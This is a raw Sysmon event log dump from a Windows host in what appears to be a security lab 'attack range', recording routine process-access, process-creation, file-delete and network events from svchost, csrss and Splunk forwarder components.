14:19:50.952{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044540Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044539Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044538Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044537Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-1886-629A-2607-000000006002}3036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044536Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1886-629A-2607-000000006002}3036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044535Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.952{0A5DF930-1886-629A-2607-000000006002}3036C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000044534Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.467{0A5DF930-1886-629A-2507-000000006002}16042008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044533Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.420{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E17211CEACD85FD0B991F10E04859B36,SHA256=C4FB55F20224AE1F4D4D70AF46DFE842D2AE36BFCA3A839B1902DE95A211D975,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044532Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1886-629A-2507-000000006002}1604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044531Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044530Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044529Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044528Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044527Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044526Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044525Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044524Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044523Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044522Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E35B-6299-0500-000000006002}412948C:\Windows\system32\csrss.exe{0A5DF930-1886-629A-2507-000000006002}1604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044521Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.280{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1886-629A-2507-000000006002}1604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044520Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.281{0A5DF930-1886-629A-2507-000000006002}1604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044519Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:50.202{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=F8903D990C74638C30E9FD76D3D86A66,SHA256=900E08537686E32D0F654623CC6E72E688FA77E881ECA00B728317812BCCA19F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044518Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:47.648{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52364-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x800000000000000044564Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.795{0A5DF930-1887-629A-2707-000000006002}11321472C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044563Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1887-629A-2707-000000006002}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044562Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044561Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044560Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 